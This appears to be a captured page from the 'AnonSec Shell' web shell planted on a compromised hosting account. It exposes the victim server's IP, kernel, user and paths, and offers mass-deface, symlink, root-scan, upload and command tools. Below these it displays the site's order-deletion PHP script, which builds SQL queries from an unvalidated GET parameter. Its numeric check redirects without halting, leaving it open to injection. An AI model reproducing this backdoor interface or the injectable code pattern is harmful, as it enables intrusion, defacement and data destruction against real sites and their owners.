AnonSec Shell
Server IP : 104.21.37.246  /  Your IP : 104.23.243.32   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home2/cp648411/www/homhuan.com/mybackend/orders/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home2/cp648411/www/homhuan.com/mybackend/orders/delete.php
<?php require_once("../include/class.php");?>
<?php include("table_name.php");?>
<?php include('../include/sql_injection_get.php');?>
<?php
if(!is_numeric($_GET["id"]))
{
	?>
	<meta http-equiv="refresh" content="0;URL=../index.php">
	<?php	
}
?>

<?php
$get_id = $_GET['id'];


$list_ty = array('table'=>'order_detail','where'=>'Oid = "'.$_GET["id"].'"' ,'order'=> "ORDER BY ODid ASC");				  
$view_ty = $view_db->view($list_ty);
$result_ty = $view_db->q_re($view_ty);
while($row = $view_db->q_ro($result_ty))
{
	$sql_sp = array('table'=>'product_size','where'=>"id = '".$row['SPid']."'");
	$view_sp = $view_db->view($sql_sp);
	$row_sp = $view_db->q($view_sp);
	
	$stock_to = $row['ODqty'] + $row_sp['stock'];
	$list = array
	(
		'table'=>'product_size',
		'id'=>$row['SPid'],
		'stock'=>$stock_to
		
	);	  
	$add3 = $actiondata_db->edit_db($list);
}

$sql_or = array('table'=>'orders','where'=>"Oid = '".$get_id."'");
$view_or = $view_db->view($sql_or);
$row_or = $view_db->q($view_or);
$list = array(	
			'table'=>'ship_addr',
			'SAid'=>$row_or['SAid']					
		  );
					
$delete = $actiondata_db->delete($list);
	
	
$list = array(	
			'table'=>'order_detail',
			'Oid'=>$get_id					
		  );
					
$delete = $actiondata_db->delete($list);

$list = array(	
			'table'=>'orders_promotion',
			'id_order'=>$get_id					
		  );
					
$delete = $actiondata_db->delete($list);

	
//print_r($delete);
//exit;
	
$list = array(	
				'table'=>$name_table,
				'Oid'=>$get_id					
			  );
					  
   $delete = $actiondata_db->delete($list);

	$_SESSION['er'] = 'de_true';
	if( $delete['suc'] <> 1)
	{
		$_SESSION['er'] = 'false';
	}
	
	
	
if($_SESSION['er'] == 'true')
{
	$add = $User_db->log_Admin($_SESSION["admin_cn_id"],$_SESSION["admin_cn_user"],$name_table,'delete-'.$get_id);
}
?>
<meta http-equiv="refresh" content="0;URL=list.php">
<?php
exit;
?>

Anon7 - 2022
AnonSec Team